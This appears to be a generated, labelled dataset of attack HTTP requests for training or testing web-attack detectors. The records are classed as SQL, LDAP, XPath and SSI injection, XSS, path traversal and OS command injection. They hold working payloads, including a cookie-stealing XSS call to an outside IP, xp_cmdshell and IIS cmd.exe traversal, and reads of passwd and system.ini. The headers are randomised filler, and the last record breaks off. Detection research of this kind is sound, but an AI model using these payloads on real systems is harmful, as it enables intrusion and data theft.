Via: HTTP/3.6 0.222.205.78, 4.6 www.RsLe.gif:7524, HTTP/0.7 5.68.185.127
Transfer-Encoding: compress
Upgrade: 4nbliA/2.5, eous/5.8, fatd0y/7.3, htsLm/7.0, ejSl/2.7
Warning: 433 www.lisatk.htm "tl3Nr" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44025
Start - Id: 49111
class: XPathInjection
GET /m47ypy/tiset3he.jpeg?4raEmo=i7o&1h=00&nuyudnh=erdhlEhUigb%5D%3B7ade%25&G2@EgDgjusrcsi=0108&GCdi=0116++or++++1%3C++Pred3%2FdejAn%2Feols%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D746%5D+++++or+++604%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27 HTTP/1.1
Host: 189.140.66.18:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tS-AeioLN;q=0.2, mmt-nbhtraj;q=0.2
Cache-Control: max-stale
Client-ip: 55.5.98.251
Cookie: kdhWtUZ=gengcnnkiht;sd=537461666;tbwesdanaduviN=0368;ytaoe9=5;0C2t_7id=2u1B;o2ncNwindow.openE=422
Cookie2: $Version="48"
Date: Sun, 25 Apr 04 05:36:58 UTC
ETag: "HJSkhgk7YNZkVCt5Kax"
Expect: 100-continue
From: o1Nf5@ocset.it
If-Modified-Since: Tue, 02 Mar 04 06:30:44 GMT
If-Unmodified-Since: Sat, 06 Dec 08 04:43:18 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8438
MIME-Version: 8.7
Pragma: 1jjer=aiihc
Proxy-Authorization: oevat nzIsEaox=dredr
Authorization: Digest uri=/tsd2m/na6fn.png
Range: 0-74,143-417891,826-067929
Referer: http://y3aF.org/ksEnxpb/vgm3l/5eow/vieanlt.sh
TE: chunked,trailers,trailers
Trailer: Referer
User-Agent: fqtyreDOr2/7.7.1
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9298x371
Via: 9.4 105.145.37.4:8818, HTTP/3.1 67.67.54.173, 1.6 www.EasavI.png
Transfer-Encoding: compress
Upgrade: ftis/8.4, aiar9w/5.5, wticg/0.0
Warning: 493 www.vAina.gif "Az9djfetb" 
X-Forwarded-For: 0.51.163.102
X-Serial-Number: 2617169573
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 49111
Start - Id: 36855
class: LdapInjection
GET /reassedeGaoytema.css?cuwinntT@rcppsAKiPB=b&wr4nsmoh=hekaAXSPZ HTTP/1.0
Host: www.peeJ.de
Connection: close
Accept: */*;q=0.2
Accept-Charset: x-mac-ce;q=0.5, windows-1254;q=0.7, x-mac-icelandic;q=0.6, koi8;q=0.5
Accept-Encoding: *;q=0.1
Accept-Language: iei)(&(objectClass =    eeu*)
Cache-Control: only-if-cached
Cookie: xZiNwhereKSZnull=414118;gtltlin=wu;gb2seyStcm1=e0
Cookie2: $Version="869"
Date: Wed, 04 Jan 06 07:45:59 CET
ETag: W/"FaFmDxnZfXPqO-EeP"
From: lvelladt@3trbvtitH.net
If-Modified-Since: Wed, 15 Feb 06 20:03:49 UTC
If-Unmodified-Since: Sat, 03 Oct 09 16:43:45 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 322
MIME-Version: 9.2
Pragma: no-cache
Authorization: psitn oro5b=loh2eE
Range: -0235,09-
Referer: http://www.e8gi0o1h.cz/lty1h/ioeOJ/Tohi/lotbn.css
User-Agent: Mozilla/7.2 (X11; U; SunOS sun4u 8.7; oh-no; rv:7.3.2) Gecko/76437894
UA-Color: color32
UA-Pixels: 6170x381
Via: 0enwi/6.3 69.33.121.221:3
Transfer-Encoding: deflate
Warning: 449 www.1trt.gif:081 "UlredsomtoT1g" "Sat, 20 Feb 10 20:48:04 UTC"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36855
Start - Id: 46841
class: XSS
PUT /7gQX1nqoaZB-txFrGk/xpqX/eA1Tz0UjvgTG/aayIhon/rtnaar1senih/Rz/9r9@uiDWxj1/UyNZIQrCupdatepK.K.cfm? HTTP/1.0
Content-Length: 226
Content-Language: actScfj,r,eyn
Content-Encoding: compress
Content-Location: http://tdon.uk/oib5dh/tixdpi5/ntlEt6/ehoitmNc.cfm
Content-MD5: Nm1vcm9hYWFlZWlnaWF0dA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 20 Mar 08 11:21:47 CET
Last-Modified: Wed, 13 Dec 06 14:47:41 GMT
Host: 56.198.184.41
Connection: close
Accept: */*
Accept-Charset: x-mac-hebrew;q=0.6, ks_c_5601-1987;q=0.3, x-mac-ce, x-mac-icelandic;q=0.5, windows-1253;q=0.3
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: max-stale
Client-ip: 220.1.146.36
Cookie: ykcayt7t=eliiS1DF0XO;hul=wuAd1Z9EeQM;IwhereTHservicesMC40=txraceejw9dx3ia0s;9Es=3lfLmen3ctt
Cookie2: $Version="455"
Date: Wed, 14 Jan 04 23:31:53 CET
ETag: "jzY25ePpsai@EB.S_"
Expect: 100-continue
From: fassgdh4@tikal0.com
If-Modified-Since: Fri, 03 Nov 06 12:49:41 UTC
If-Unmodified-Since: Tue, 04 Dec 07 01:36:58 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 13 Jan 10 17:14:26 CET
Max-Forwards: 2
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="5iwrlmu"
Authorization: Basic ZGdyZ3ZmcTpzZ2x0bQ==
Range: -85
Referer: /dt9t.msf
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: bnmS9f http://www.iegIsAex.net
UA-CPU: Sparc
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: 3.6 64.137.200.241, 9.8 112.137.222.239:41
Transfer-Encoding: compress
Upgrade: ccSen/7.1
Warning: 515 www.wruorr.jpg "seuttb" 
X-Forwarded-For: 67.114.213.31
X-Serial-Number: 072274181665
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

xvT3jKHmetadJ9=<link rel    = "   stylesheet    "     href   ="     javascript: [window.open('http://121.134.84.185/nstang.php3'+document.cookie);]    "   >&ktuoy3pcdaHE=nsiUzkaiyr15eE

End - Id: 46841
Start - Id: 36276
class: PathTransversal
GET /f_XfdP2wP5_/yerereb/_p4rsiBW/1C/9atsghhpr0/etcABQP/bhawaiei9b.jpeg?hlaeboso=a3&wrrtbe=uc3l8VuSR9yH&asnbHt7n=tt%26o%3B&pe=rI%3F%251sec+nph-seid&te=ot0t&rsehlll5esm=a%26%40-dta+s+o%2B+&hmenrIdjerdpa=2&r30w1eecdre3e7p=+94e&jeuekahemrrr=eRD0&9hmhrti=%2Fetc%2Fhttpd%2Fhttpd.conf&egNoloea=9412921 HTTP/1.1
Host: 61.93.42.246
Connection: O9aInl1e
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: compress;q=0.6, gzip;q=0.8, compress;q=0.0, gzip, gzip
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 117.40.148.200
Cookie: TtleHho8edth=ncUbvxu.GrH;37=itsGe;d4t9iRlijkzt=' s7Ee;TmHgYWpsCO21=95962317
Cookie2: $Version="13"
Date: Sat, 19 Jun 04 08:24:00 UTC
ETag: W/"9BVqFjumZrGDUWhR"
Expect: eeoeO=e3rsdt9
If-Modified-Since: Thu, 22 Jan 04 08:49:29 UTC
If-Unmodified-Since: Thu, 30 Nov 06 21:00:47 CET
If-Match: "X-Yv8sav9fTbMZeV"
If-None-Match: "10VRY0GGsC.J-tBl3In"
If-Range: Wed, 19 Sep 07 04:56:44 UTC
Max-Forwards: 73
MIME-Version: 1.2
Pragma: tstTabt2='uNht'
Proxy-Authorization: Digest realm
Authorization: syto ojead=nreittr
Referer: /nnag/syonh.cgi
TE: gzip;q=0.2
Trailer: Accept-Encoding
User-Agent: Mozilla/7.6 (Windows; U; WinNT 9.9; er-ww; rv:0.2.5) Gecko/33619973
UA-OS: Solaris
UA-Pixels: 070x739
Via: mcsifs/1.5 www.pTOea.htm, 5.7 226.194.7.217
Transfer-Encoding: deflate
Upgrade: t6a9mC/0.8, isrjmh/3.6, Wb7h6/0.9
X-Serial-Number: 3858869813582017
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36276
Start - Id: 42029
class: SqlInjection
GET /mpxgob9tnahe/r3Dhpow4dn/eMD/tWuO.M-4UabkkZCcZzDc/hc0I6nAeihpuet.php?e8nltuaasOaliq=89geesnph-i9pa%2Fry%2F&1etTdheecQs=nibf2eCe&tsenauvl=OR+++++%27syresfstnB%27++++%3D++++%27++++%27&layd=aCr2eiothtTyzie&nd69Ceilemn2g=%3B8tcr&hxhtEtahshGtnv=b&easriomY3etje4d=4548034&tl2ijjDm=576136&iaaoae6i4sn=iaEayttltn&sNiracNlosreb=%5Csbna HTTP/1.1
Host: 184.0.46.147:80
Connection: erbOtasz
Accept: */*;q=0.6
Accept-Charset: utf-8, shift_jis;q=0.5, iso-2022-jp;q=0.9
Accept-Encoding: 
Accept-Language: a-hqnhagap;q=0.1
Cache-Control: no-cache
Client-ip: 144.52.64.113
Cookie: VESOaBBvfJg=rS.0KXr;RFITvgahYMBZ=~g9tr A
Cookie2: $Version="324"
Date: Sat, 17 Sep 05 10:00:37 GMT
ETag: W/"lA1u1EyP2heJ6CUKvO"
Expect: 100-continue
From: eliqs@octere.st
If-Modified-Since: Thu, 17 May 07 20:32:09 CET
If-Unmodified-Since: Wed, 02 Apr 08 14:05:18 UTC
If-Match: *
If-None-Match: *
If-Range: "gghkTF6AUe5h4pJ"
Max-Forwards: 63
MIME-Version: 9.3
Pragma: cdoq='ulz90eh'
Proxy-Authorization: Digest response="8EBC6AbfdcBAA2fEA94dfDD61baEC0de"
Authorization: cces otcyhxtr=dmut
Range: 4936-0,-6636
Referer: http://www.a02toy.uk/yoadaU/bd9atl.htm
TE: trailers
Trailer: Date
User-Agent: Mozilla/5.1 (X11; U; Solaris 4.9; or-hj; rv:1.2.4) Gecko/76216883
UA-CPU: 68000
UA-Disp: 7502,392,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 422x9399
Via: 6.4 254.237.247.163
Transfer-Encoding: deflate
Upgrade: tomgi/1.4, rQn9a/6.1, etcrc/1.8
Warning: 769 10.15.201.53 "Godo5tfeue" "Sat, 19 Aug 06 13:20:24 UTC"
X-Forwarded-For: 128.48.152.130
X-Serial-Number: 063116688396663
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42029
Start - Id: 36429
class: OsCommanding
PUT /uhppmyieuew4l3c9etzh/aycroiiedljoC/sevRKU-K58-UG/mwuq0O5vzl/efyttItcM/dnut1oonogo1s/wbX7vyoEUs2VKtx5qK/ssaream6aguIdmir/B.j./bT/6foZB3rm3r1V.shtml? HTTP/1.0
Content-Length: 128
Content-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Host: 170.133.18.189
Connection: keep-alive
Accept: video/mpeg, video/quicktime;q=0.3, application/*;q=0.9
Accept-Charset: x-mac-turkish, gb2312, us-ascii, koi8-r
Accept-Encoding: *
Accept-Language: qTcsian-ith;q=0.7
Cache-Control: max-stale=2850
Cookie: eo7azK=hcat;UD9ohtaOemnnc=aMQ;oe=';EXEC   master.dbo.xp_cmdshell 'cmd.exe;sAema=wE6vognud4ec9ues
Date: Wed, 17 Aug 05 09:30:48 CET
Expect: 100-continue
If-Unmodified-Since: Wed, 23 Jul 08 22:54:04 UTC
If-None-Match: *
If-Range: Tue, 26 Dec 06 05:18:01 UTC
Max-Forwards: 0228
Pragma: no-cache
Referer: http://www.Inirlli.cz/eeavitii/efl5/efrHrt/urrgtOsa.conf
TE: trailers,gzip,chunked;q=0.3
User-Agent: z-FnD7 http://www.ageT.gov
~~~~~: ~~~~~~~~~~~~~

6eiynae=1F5IrHB&hl=532&se1ieerO=iwp-wn:inihyio/a nullfl&qw8ocokbyio2=xjt&ennfp=29&iATtennm=iYeMiurdl1hxng&evalv8w1XcJ-6=jidy

End - Id: 36429
Start - Id: 46301
class: PathTransversal
GET /shernuiftrra9/orCsOLb/S3/iC.T/8e7ORskd9taeeti/h4hq1blsA./rmczU0.php?GAOb=%2F%2C%2C%2C%2Feoehr%2FniuTnn%2Fpasswd&4t=258&mSnrr=34&ez=aA&4zHdlinklincludevrGhD=te9Snttuniondee&tntel1egpn=aeswlvo&0eIntdytus=b6HzTH8J3&rR9ainetna03=kaE&rae=z_prTMw&aisnigp=pf&bphpsyQbCMwCv=hBCOab&eR4orhoi=e3rehwte0uw&y5r7JcydocumentkG=+loG&n9alnjeQ=265682&0aeNx7Hxterm=%7Csu5ombismtp HTTP/1.1
Host: www.argcyuOFe.net
Connection: keep-alive
Accept: text/xml, video/*;q=0.5
Accept-Charset: windows-1257, utf-8, isiri-3342;q=0.5
Accept-Encoding: *
Accept-Language: nCi-beor;q=0.4, i-metuTb;q=0.5, n-soddej;q=0.6, bx-UN;q=0.8
Cache-Control: no-transform
Client-ip: 34.236.80.20
Cookie: 8RD@p_@=3107504;weplj=un n\n;sperlLshutdown=eqxp_naO)~ER6oalinktranrq;jentban=2088628350;orA1eyusSpOmegN=2H.qaJXUcJk
Cookie2: $Version="73"
Date: Tue, 12 Aug 08 12:33:06 GMT
ETag: W/"l1XkmFGdW1ggoyh14oL"
Expect: u5Nat=ph9ni;1Cybele
From: twei@aedq.de
If-Modified-Since: Tue, 13 Apr 04 13:06:07 UTC
If-Unmodified-Since: Tue, 20 Dec 05 24:56:40 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 12 Jul 09 10:55:43 CET
Max-Forwards: 87
MIME-Version: 8.6
Pragma: n=soBPs
Proxy-Authorization: Basic aGlFYTp3YXR0T24=
Authorization: bIda Eheqb=Oiplme
Range: 5-,07-2
Referer: /3qo1bKyn/5tzwdose/rIcdao/9de1jni/ae1dr.png
TE: gzip;q=0.9,trailers,gzip;q=0.3
Trailer: If-Unmodified-Since
User-Agent: e1u7hstAnt9ry
UA-CPU: 68000
UA-Disp: 542,0115,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1380x824
Via: 3.7 www.yilftr.gif:2112, ait/3.7 103.159.168.69
Transfer-Encoding: gzip
Upgrade: rri3/7.9, gpmees/3.2, aFeB/6.3
Warning: 165 170.166.64.203:01144 "oSte0enOhlsosme9awi" 
X-Forwarded-For: 207.118.108.52
X-Serial-Number: 0260257
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46301
Start - Id: 47068
class: XSS
GET /tfb/eeTazR-NWlL_dNw-/qoTnoffrsbs8/a7l-xABh-JeyxQC/5tbanaa9a6oxyh/9josyaBtIeWAlfvrt.cfm?thwwoll=onNM4&ogtKxuIde=aB0-3QYTJ&dpyrrsa8=rE6tie+%22++++++++style%3Dleft%3Aexpression%28alert++%28%22++++gt.rojlth+++++%22%29%29+++++alt%3D+++%22&ermAtDipo=l08&eno=mes%25uef+&hsed=uheBESvbT&iiwnoaiaet=584&IemtiqeArra=9.Ke HTTP/1.1
Host: 164.18.212.37:1789
Connection: jorto8in
Accept: audio/basic;q=0.0, text/html;q=0.8, video/mpeg
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: uhed2o-ili;q=0.5, om-2Na3, zaqvoasO-lahi, ga-D
Cache-Control: no-transform
Client-ip: 217.116.65.138
Cookie: nfnsA=wgetfrommochav;0firetiionta= uelhy 8 ypBr;ienR=lorehioe1e
Cookie2: $Version="5"
Date: Sat, 05 May 07 12:37:43 UTC
ETag: W/"MIaFp1p7_LSKfHORN"
Expect: 100-continue
From: l5ga@0acwrnnsyp.biz
If-Modified-Since: Mon, 05 Jul 04 17:00:23 UTC
If-Unmodified-Since: Tue, 12 Feb 08 14:22:48 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 04
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: NTLM dGJ0b2VjdDBhdG1zb3V5dGx1b2V1aWJzc0s2MXpobmliYXRoZWVpbw==
Authorization: Digest cnonce="p0oa"
Range: 42191-21573,0-729,-0
Referer: http://Vmrno.fr/hseasEr/snLk/o6eenmsy/nebpu/YEo6.pdf
TE: trailers,gzip;q=0.4,deflate;q=0.1
Trailer: Via
User-Agent: Mozilla/8.3 (Machintosh; U; PPC 7.5; te-ss; rv:7.3.2) Gecko/42811100
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 987x1282
Via: 7.4 207.240.198.26
Transfer-Encoding: identity
Upgrade: doNfr/2.8
Warning: 889 109.167.98.103 "ceSomrehteyFeh" "Sat, 20 Jan 07 24:44:38 UTC"
X-Forwarded-For: 240.93.48.210
X-Serial-Number: 9140776636485
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47068
Start - Id: 40240
class: SSI
GET /ntNc2unnmfaclerocs/e11UX6e.Uyc/iL/rc3PZTPE0V-_6i/IuPpRgQQNC_5/oyJwr00zvKZd8JT.aspx?EP72Ym=aYYlDM7aM&e81cehoa=991738&stoma=505586&uteniy=+hbeJ&jd8anh9agit=lad&0ehshhtolhhe2=11941912&ihloins9UoHoemu=%5Befeon+7o9dcE%40s&Tsazsiswnu=936789072&mua4ng=929093085&aDw3o=95&uqUlL=llaynotsocj&wie=rYE3&lhlorud=2irymi6&cs=iTpmaq3cea8dNod&in=00965 HTTP/1.1
Host: www.srjqaldogo.uk:80
Connection: Tace
Accept: video/mpeg;q=0.3, audio/*;q=0.8, image/*
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: taOt8lew-f;q=0.8, io-xi;q=0.4, 1va8h-pawaeXth;q=0.3, 4d-upsed;q=0.2, rhRO-zslnle
Cookie: 5JItmp=<!--  #exec cmd="c:\progra~1\enDeaaenp\0gonire\imCyaeeo.exe     d:\fulA5\www.arratoleor.org\eunse\database.mdb   /x    exporttofoxpro"-->;x0wi16dfmath=et;AbeKSe=Sore;auiWsFs=olPc
Date: Thu, 29 Apr 04 24:19:26 GMT
ETag: "MSK-v_ITPQ0ogQnT2"
Expect: iGmSim=emqc;aE1rK=fobyds
From: ltensne@Rm7ipT.cz
If-Modified-Since: Wed, 08 Feb 06 18:26:48 CET
If-Match: "i42Xel8UfvbeIOlm10"
If-None-Match: "tDnEGmI-Id-P.X7Ear8z"
Max-Forwards: 648
Pragma: no-cache
Referer: http://www.ttPeegpn.ch/fIeobePq/dmKmqsmo/thMx47ye/hrfrCht/iSrug2.php4
User-Agent: Mozilla/3.6 (Machintosh; U; PPC Mac OS X 5.9; H3-5r; rv:5.0.0) Gecko/56355197
UA-Color: color16
Transfer-Encoding: deflate

null

End - Id: 40240
Start - Id: 40413
class: SSI
POST /7t7_px4xwqwcP@MG./n776fLehc/rasiexas/pvntttahhe/ZYwsamwindow.openlocationWx0dOowp/cSYH9eysTmpleOseecl9.mspx? HTTP/1.0
Content-Length: 234
Content-Language: Tsy
Content-Encoding: deflate
Content-Location: /ire7b3j/keln8i/d4j4.msf
Content-MD5: cGxlbjJidHJiaGV1QW9Fbw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Dec 04 03:56:11 GMT
Last-Modified: Fri, 08 Dec 06 09:32:30 CET
Host: 80.215.16.122
Connection: close
Accept: video/*, application/zip
Accept-Charset: euc-cn, iso-2022-jp, windows-1255, iso-2022-kr
Accept-Encoding: compress, deflate;q=0.3
Accept-Language: *
Cache-Control: max-stale=49462
Client-ip: 21.209.58.212
Cookie: nmmstis=drbgeeda oas;blete=83;tt=tdcymedRtaLeZqt;1eet=n3HvV;rordmrl6n7reqea=wed4alll;tnxAsNareie=eeo~C
Cookie2: $Version="3"
Date: Fri, 22 May 09 12:28:50 CET
ETag: W/"5EI0NvigZQ0wYh_Mhu1T"
Expect: Ez1ltad3=mhoy;Tonfn54
From: rQkb4al@ootSiafmsu.cz
If-Modified-Since: Thu, 12 Jan 06 15:30:47 CET
If-Unmodified-Since: Sat, 25 Nov 06 05:35:55 UTC
If-Match: *
If-None-Match: "pHlSoQiWcRBXr@k_NI"
If-Range: Thu, 04 Jun 09 22:58:57 CET
Max-Forwards: 6378
MIME-Version: 6.8
Pragma: cTo='enh'
Proxy-Authorization: datl 7ziWgict=Jnpued
Authorization: Basic cDI4Y3pzOmR1amE5cw==
Range: -636429,-84349,684171-
Referer: /sanaba/ryao/rEnYr/wGeae.asmx
TE: trailers,chunked;q=0.1
Trailer: Proxy-Authorization
User-Agent: ev79VznHT0 http://www.a4vni.biz
UA-CPU: 68000
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5480x145
Via: HTTP/7.9 www.aigatded.png
Transfer-Encoding: deflate
Upgrade: ufb/8.5, d45i3/7.9
Warning: 035 www.nptm.css "Dihtxrtnxon" 
X-Forwarded-For: 55.196.49.158
X-Serial-Number: 139491400709
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~

Lhxtzwn3m=tadminTrryj8 oi&6sUWxVgroup by=mrpinputjue&xtv_hzuPDqjrcp=tsawbeoeeneq&FeMG.Y5TQ=autoexec)e&tjmw=metarij&Dh=746229239&nfiTea4=6ytpoelog &Dnpg=<!--   #include     virtual="d:\windows\autoexec.bat"    -->

End - Id: 40413
Start - Id: 45780
class: PathTransversal
GET /ioemMHCe/tB@g1928g/oneo0eickg/gQBE/c3zef4el/8fyte0eaao/erjR.tiff?7lZebeay9=eswtuDzfulselc8te&aqodebof=fcDoanrD&utrns=+hRD&hreuense=sHrn&es6=s.jMl&weuwtzhvoaRog=7815098&7shptmths=%5CWINDOWS%5Csystem.ini&elhsmn39av=e7%5CrzTkslb%7Enri HTTP/1.0
Host: 64.91.202.114
Connection: keep-alive
Accept: text/*, video/mpeg;q=0.9
Accept-Charset: iso-8859-7, koi8, utf-8;q=0.8, us-ascii;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: min-fresh=93
Client-ip: 79.240.194.64
Cookie: zUe= rindausrteht<oo;dmlatp4=7
Cookie2: $Version="2"
Date: Sat, 08 Dec 07 07:50:40 CET
ETag: "1UYXYoyn1ISOZ-ytTEbk"
Expect: fli7=ifppb
From: a3y5m@itfi.st
If-Modified-Since: Thu, 21 Jan 10 23:48:41 GMT
If-Unmodified-Since: Tue, 20 Jan 04 02:18:44 UTC
If-Match: "Y-T2rMnRieNYjLlARv"
If-None-Match: "D8ZJiNloG2M0lLIgu"
If-Range: "Irwt@In046fuLsQ0."
Max-Forwards: 6
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: nE0np rioae=tsisa
Authorization: oexndP er7lw7e=8laieuG
Range: 61230-1,22438-
Referer: /a32El.jpeg
TE: gzip,trailers
Trailer: If-None-Match
User-Agent: vouJj1XY http://www.raJmrbor.gov
UA-CPU: PowerPC
UA-Disp: 4288,202,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7251x584
Via: HTTP/4.4 www.hpseIo.gif, 3.8 www.imr7y.jpg:2, 4.9 www.Fsod.js:0868
Transfer-Encoding: gzip
Upgrade: uit4/0.5, toct/8.1, blgp/4.0
Warning: 610 192.1.135.3:2396 "ysstaeiltotrenks" "Sun, 26 Mar 06 18:59:14 UTC"
X-Forwarded-For: 0.142.120.56
X-Serial-Number: 324157325
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45780
Start - Id: 45676
class: PathTransversal
GET /stdin1cjWO2yk/fnoNpvda2nenytetnyer/og.tiff?7t3yl-i-=6do+&5w=ihhkMp27&Eztsheii1Mtkg=cesEli&qmaemdsmcht9ij=..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&EZACcQnJKMrM=rnob&tNnnepcomcdx=amfeSH2Sv&1utnuh=719&s7eehdmuesit=els4Gtteis+aqtExeie&nwanptSneST=79114892&C3azadminnFehttpsK=oego&WLnKLnH=%5Cndrop&UCEb=59&0yZzJ=wrndeynfoO- HTTP/1.0
Host: www.2jiW7M5esl.st:80
Connection: keep-alive
Accept: text/*;q=0.1, text/xml;q=0.1, text/*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 10.24.0.201
Cookie: of=49
Cookie2: $Version="542"
Date: Tue, 18 Apr 06 22:51:35 GMT
ETag: "d3OxHUukZzKDM.slNqr5"
Expect: slmtuts
From: nerbc@c9tot8nhs.cz
If-Modified-Since: Sun, 14 Mar 04 19:12:49 CET
If-Unmodified-Since: Mon, 27 Oct 08 02:40:37 UTC
If-Match: "hHkbkBmiYuc-XI.Frg"
If-None-Match: "cUIgVCA7eKWAFvfKX"
If-Range: Mon, 23 Apr 07 11:48:01 CET
Max-Forwards: 1
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="vhio"
Authorization: aers aaSti=eeEoss
Range: -368400,7896-37283
Referer: /yaaM.wav
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/0.6 (Windows; U; Windows NT 7.6; aa-gr; rv:1.3.9) Gecko/51380161
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 488x430
Via: FTP/7.1 240.186.209.6, FTP/5.9 www.teitf.tiff
Transfer-Encoding: deflate
Upgrade: smhza/6.1, omsu/2.6, 8ysein/9.3
Warning: 534 45.179.228.107 "hsatu" 
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45676
Start - Id: 37523
class: LdapInjection
PUT /hXmKuXwHejl-2yv.hxP/a11rEy0Yk1d/DT/Peejkv2AgtepItii/jn/dYY/Jwan8gneflet6c7Dk/eHtv10sfreitabHetape/h87aC/4nig8ns/cIdT.gif? HTTP/1.0
Content-Length: 208
Content-Language: eomh3,ch
Content-Encoding: gzip
Content-Location: /ysesH9/NHeth/ween.tar
Content-MD5: eWVlcmZhbGN0dG50bGU0aA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 31 May 09 08:08:37 CET
Last-Modified: Tue, 20 Apr 04 21:19:49 CET
Host: 188.126.2.205:80
Connection: keep-alive
Accept: application/postscript;q=0.6, image/jpeg;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: seTt-mhlxoabl
Cache-Control: max-age=84115
Client-ip: 128.14.44.106
Cookie: r73SokHQ8r=5;tehiy8hEtqe= yg ;a9s8tr7Lnnceq=6
Cookie2: $Version="192"
Date: Thu, 10 Aug 06 03:09:10 UTC
ETag: W/"H4OW_Cu4PoCATud"
Expect: 100-continue
From: nIt1h@rvrs.org
If-Modified-Since: Thu, 17 Jan 08 11:22:36 CET
If-Unmodified-Since: Thu, 22 Mar 07 01:29:52 CET
If-Match: "cwXPK.00F4rWBLp"
If-None-Match: *
If-Range: "V9jx2CQYpKH4r6HIUp"
Max-Forwards: 06
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: NTLM bmFsZnRybWs1VG1ybmVlTGh3Z2l3dDVGZDFubnNib0EwOWl3bTRoUnZOMm53aW9p
Authorization: NTLM c25xY29lbGVzZWE1UmFBdG9jNm1lZGV1RWRwbWtBZnRhbTNwa3Jh
Range: 0516-7855,069180-,334-
Referer: http://ub5ar6wl.cz/Mo3Hrnte.nsf
TE: gzip;q=0.5,deflate;q=0.1,trailers
Trailer: Connection
User-Agent: Mozilla/6.4 (X11; U; Open BSD i586 9.4; k8-el; rv:8.2.9) Gecko/02256006
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 428x4367
Via: 6.4 95.218.183.57, 9.7 104.205.119.33:0
Transfer-Encoding: identity
Upgrade: c0e/0.5, ndgd/9.1
Warning: 123 www.sswne9.png "xiaoxtnnd9tipju" 
X-Serial-Number: 4606842395290054569
----: ----------------
~~~~~: ~~~~~~~~~~~~

yi1os8iarsmz6i=8382&jhEjrJ=) (|  (displayName=had*) (name    = had*   )( mail=had*)&tapaohdnrieTc=6dten9auv7su&ni4tzieit=mjmasm&tnghelm=524&s4mkgdivCJZvP=Il-%&cQtb8=1&irjsytaSlNm=ph.

End - Id: 37523
Start - Id: 43854
class: OsCommanding
GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.olesqd.ch
Connection: tenga
Accept: audio/*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: rew8-m8t, irmdH-dtTtvi, eb-d, tc-TeeiTrzp
Cache-Control: min-fresh=673
Client-ip: 9.232.251.46
Cookie: CvD_=se;Medtaz=793;sNert=ix.I1JDzj3k;3reiehktcibzeiM=ena
Cookie2: $Version="07"
Date: Wed, 05 Jul 06 01:01:05 GMT
ETag: W/"77rk5N1JK52-rQYG"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Mon, 16 May 05 22:17:20 GMT
If-Unmodified-Since: Wed, 12 May 04 03:05:51 UTC
If-Match: "iT.aZsHebK.VkG68xcBy"
If-None-Match: *
If-Range: *
Max-Forwards: 005
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="tRstaerb"
